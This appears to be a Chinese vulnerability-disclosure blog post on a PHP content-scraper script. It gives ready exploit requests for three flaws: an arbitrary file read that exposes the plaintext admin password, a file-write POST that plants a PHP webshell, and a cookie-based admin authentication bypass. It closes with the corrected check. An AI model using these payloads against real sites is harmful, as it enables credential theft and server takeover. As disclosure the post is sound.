搜搜问问小偷程序天宇版 前台任意文件读取 后台任意代码写入漏洞

admin 2021年4月3日20:02:43评论0 views字数 1102阅读3分40秒阅读模式

打算用小偷程序做一个网站的就下载了一套程序结果就悲剧了

下载地址:http://down.chinaz.com/soft/27853.htm

1、前台任意文件读取漏洞:

img.php文件代码

php $p=$_GET['p']; 
$pics=file($p); 
for($i=0;$i< count($pics);$i++) 
{ 
echo $pics[$i]; 
} 
?>

典型任意文件读取没有任何验证

利用方法:/img.php?p=./admin/data.php

读取管理员帐号密码 明文的哦

2、后台任意代码写入:

admin_ad.php 最后一段代码

}elseif ($_GET['action']=="add"){
        //echo $_POST['js_mb'];
        $file="../ad/".$_POST['js_file'];
        $fp=fopen($file,"w");
        fwrite($fp,stripslashes($_POST['js_mb']));
        fclose($fp);
        echo"";
}
?>

利用 发送POST数据

path:/admin/admin_ad.php?action=add

POST数据包:js_file=x.php&js_mb=

既可在网站ad 目录下生成一个x.php的一句话木马 密码cmd

该文件头部,验证不足:

 
include('data.php');
if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){
        echo"";
        exit;
}
?>

逻辑错误知道其一即可绕过

转自:http://www.90sec.org/thread-1704-1-1.html,内容有修改。


后台的权限验证问题,设置Cookie:x_Cookie=用户名 y_Cookie 等于密码即可通过验证

if($_COOKIE['x_Cookie']!=$adminname and $_COOKIE['y_Cookie']!=$password){

这个逻辑漏洞很狗血,作者一定是蛋爆了才会这么写……

正确的应该为:

if($_COOKIE['x_Cookie']!=$adminname or $_COOKIE['y_Cookie']!=$password){

或者:

if($_COOKIE['x_Cookie']==$adminname and $_COOKIE['y_Cookie']==$password){

留言评论(旧系统):

佚名 @ 2015-02-01 17:19:54

没有看懂你的意思,你悲剧哪了??

本站回复:

意思是这套程序漏洞太多。

文章来源于lcx.cc:搜搜问问小偷程序天宇版 前台任意文件读取 后台任意代码写入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:02:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   搜搜问问小偷程序天宇版 前台任意文件读取 后台任意代码写入漏洞http://cn-sec.com/archives/325047.html

发表评论

匿名网友 填写信息